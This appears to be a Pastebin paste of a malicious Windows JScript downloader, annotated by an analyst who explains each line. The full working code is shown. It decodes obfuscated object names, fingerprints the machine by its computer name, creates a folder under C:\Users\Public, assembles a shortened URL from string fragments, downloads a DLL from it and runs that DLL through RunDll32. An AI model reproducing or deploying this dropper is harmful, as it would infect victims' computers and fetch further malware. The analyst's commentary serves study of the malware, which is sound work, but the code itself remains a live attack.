Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // JavaScript Document - this was the original comment. I think it's JScript, actually
- /* global WScript, exit, eof */
- var sID;
- var sIDW;
- var xID = 91;
- var cID = "LIKINHYICFWIRGD";
- var cWN3t = "FHIHEHUIKIBIIIMFRGYHWIMIPIHIKID";
- var sNomeMaq;
- var cFolder = "C:\\Users\\Public\\";
- var cScrF1l3 = "CHBHRIHHXIFIJHXIDHVFOGNHXIBHTHBIOIIIJHTICGWHQHYHTHRIJ";
- var c1nf3ctz = "";
- var sTipoSO;
- var sAwvx = "NHYBVGTVFGTDCE";
- var cHosttotal;
- var NAMEWG141 = "xcty.dll";
- var NAMENP413 = "xcty.dll";
- var cHost287 = "ht"; // the cHost variables are strung together to form a URL:
- var cHost771 = "tp"; // http://bit.ly/2KOVf8Z
- var cHost983 = ":/";
- var cHost300 = "/b";
- var cHost529 = "it";
- var cHost840 = ".l";
- var cHost694 = "y/";
- var cHost448 = "2K";
- var cHost158 = "OV";
- var cHost280 = "f8";
- var cHost360 = "Z";
- //Determine the filename to use - note this script is assuming that IE is the browser because FF and Chrome don't support ActiveXObject and will throw an error
- var network = new ActiveXObject(wdecrypt1064(cWN3t,xID)); // decryption leads to WScript.Network
- sNomeMaq = network.computerName; // uses WScript.Network object to get the local computer name
- cFolder = cFolder + sNomeMaq.substring(0, 3) + "OLNM822\\"; // C:\Users\Public\ABCOLNM822\ where "ABC" are the 1st three letters of the PC Name
- sId = cFolder + "id"; // C:\Users\Public\ABCOLNM822\id where "ABC" are the 1st three letters of the PC Name
- sIdW = cFolder + "idw"; // C:\Users\Public\ABCOLNM822\idw where "ABC" are the 1st three letters of the PC Name
- cHosttotal = cHost287+cHost771+cHost983+cHost300+cHost529+cHost840+cHost694+cHost448+cHost158+cHost280+cHost360; // the cHost variables are strung together to form http://bit.ly/2KOVf8Z
- c1nf3ctz = c1nf3ctz +"?tmpString=" + cHosttotal + "&pcn=" + network.computerName+ "&AT=" + 0905; // Decodes to ?tmpString=http://bit.ly/2KOVf8Z&pcn=ComputerName&AT=905
- //Filename & system checks. Try to download malware and save it to disk
- var fso = WScript.CreateObject(wdecrypt1064(cScrF1l3,xID)); // Decodes to: Scripting.FileSystemObject
- if (!fso.FileExists(sId) && fso.FolderExists("C:\\Users\\Public\\")) // If the file exists but the folder does not
- {
- try{
- down3546(c1nf3ctz) // Try to download the next stage
- }
- catch(err) {}
- if (!fso.FolderExists(cFolder)) // If the folder does not exist
- {
- fso.CreateFolder(cFolder); // then create it
- }
- if (fso.FolderExists("C:\\Program Files (x86)\\")) // Check to deduce whether 32-bit or 64-bit system
- {
- sTipoSO = "64";
- }
- else
- {
- sTipoSO = "32";
- }
- var s = fso.CreateTextFile(sId, true); //
- s.WriteLine(wdecrypt1064(cID,xID)); // Decrypts to: load-s3
- s.Close();
- var s2 = fso.CreateTextFile(sIdW, true); // Creates C:\Users\Public\ABCOLNM822\idw and...
- s2.WriteLine("91"); // writes "91" to it
- s2.Close();
- try
- {
- down3546(cHosttotal) // Try to download the next stage
- }
- catch(err) {}
- down3546(cHosttotal, "C:\\Users\\Public\\"+ NAMENP413); // Calls the download function with arguments: URL and filename (c:\\Users\Public\\xcty.dll)
- try
- {
- run1176("RunDll32.exe C:\\Users\\Public\\"+ NAMEWG141 + ",thnde"); // Calls the run function with arguments Rundll32.exe + Filename + ",thnde"
- }
- catch(err) {}
- }
- function wdecrypt1064(s1, id) // This function decrypts a path based on the computer name to use for storing the file to be downloaded
- {
- var sx;
- var x;
- var x4;
- var sr;
- var wx1;
- var wx2;
- var wxgx1;
- wxgx1 = 65;
- sr = "";
- sx = "";
- x = 0;
- x4 = s1.charCodeAt(0) - wxgx1; // which is 70 - 65 = 5
- s1 = s1.substring(1); // which is the variable passed into the function starting at position 1 or HIHEHUIKIBIIIMFRGYHWIMIPIHIKID
- while (s1.length > 0){ // s1.length starts as 30
- wx1 = (s1.charCodeAt(0)-wxgx1); // This equals 7 on the first run
- wx2 = (s1.charCodeAt(1)-wxgx1); // This equals 8 on the first run
- sr = sr + String.fromCharCode( wx1 * 25 + wx2 - x4 - id); // This ends up making sr= Wscript.Network
- s1 = s1.substring(2); // s1 now equals I and it's used in the loop
- }
- return sr; // returns: WScript.Network
- }
- function down3546(url, file) { // This function visits the link at http://bit.ly/2KOVf8Z and then ......
- var data;
- var ado;
- try
- {
- var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); // creates the WinHttpRequest object
- // ResolveTimeout, ConnectTimeout, SendTimeout, ReceiveTimeout
- WinHttpReq.SetTimeouts(30000, 30000, 30000, 5000);
- void(WinHttpReq.Open("GET", url, false)); // Calls the Open method
- WinHttpReq.Send(); // Assemble the request headers and sends the request
- if (WinHttpReq.Status == 404) // If 404 is the status then return "false"
- {
- return false;
- }
- data = WinHttpReq.ResponseBody; // Retrieves the response entity body as an array of unsigned bytes. Saves it in variable "data"
- }
- catch (ex)
- {
- //WScript.Echo("Error downloading file: " + ex.message);
- return false;
- }
- ado = new ActiveXObject("ADODB.Stream");
- ado.Type = 1; // binary mode
- ado.Open();
- ado.Write(data); // Writes the contents of the "data" variable to disk
- ado.SaveToFile(file, 2); // 2 = overwrite existing file
- ado.Close();
- return true;
- }
- function run1176(file) { // This function attempts to use WScript.Shell to run the file that was downloaded
- var ws = new ActiveXObject("WScript.Shell");
- ws.Exec(file);
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement